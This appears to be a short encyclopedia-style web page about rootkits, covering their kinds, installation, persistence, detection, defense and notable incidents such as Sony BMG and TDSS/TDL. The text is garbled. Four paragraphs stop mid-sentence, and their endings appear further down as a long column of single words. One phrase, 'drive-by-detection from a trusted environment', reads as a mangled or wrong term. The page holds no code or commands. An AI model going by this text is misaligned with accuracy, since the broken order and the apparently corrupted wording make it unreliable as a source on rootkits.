Home

rootkits

A rootkit is a type of malicious software designed to grant an attacker privileged access to a computer while concealing its presence. Once installed, a rootkit can operate at various levels of the system—user space, kernel space, or even the firmware or boot process—allowing the attacker to control the device, steal information, or install additional malware without easily being detected.

Rootkits are commonly classified by their point of operation and persistence strategy. User-mode rootkits modify or

Installation methods include exploiting vulnerabilities, social engineering, supply-chain compromise, or bundling with legitimate software. Once active,

Detection and defense are challenging due to their stealth. Approaches include signature-based scanning with rootkit databases,

Notable examples and history include early DRM rootkits such as the Sony BMG XCP incident (2005), various

hook
user-space
programs
and
libraries
to
obscure
processes,
files,
or
network
activity.
Kernel-mode
rootkits
alter
kernel
data
structures
or
hook
system
calls
to
hide
objects
and
grant
elevated
privileges.
Bootkits
load
before
the
operating
system,
often
via
the
Master
Boot
Record
or
UEFI,
to
achieve
deep
persistence.
Firmware
rootkits
reside
in
device
firmware
or
other
hardware
components,
making
them
particularly
difficult
to
detect
and
eradicate.
rootkits
maintain
persistence
through
startup
services,
scheduled
tasks,
kernel
modules,
or
firmware
implants.
They
typically
conceal
their
presence
by
modifying
visibility
of
files,
processes,
registry
entries,
or
network
connections
and
may
also
implement
backdoors,
keylogging,
or
credential
theft.
integrity
checking,
memory
forensics,
and
behavior
analysis.
Robust
defense
combines
secure
boot
and
trusted
boot,
signed
code,
regular
patching,
access
controls,
and
endpoint
protection
capable
of
kernel-level
monitoring
or
virtualization-based
security.
Removing
a
rootkit
often
requires
a
clean
reinstall
or
drive-by-detection
from
a
trusted
environment.
Linux
and
Windows
rootkits
in
subsequent
years,
and
highly
publicized
Windows
rootkit
families
such
as
TDSS/TDL
and
Stuxnet-era
techniques.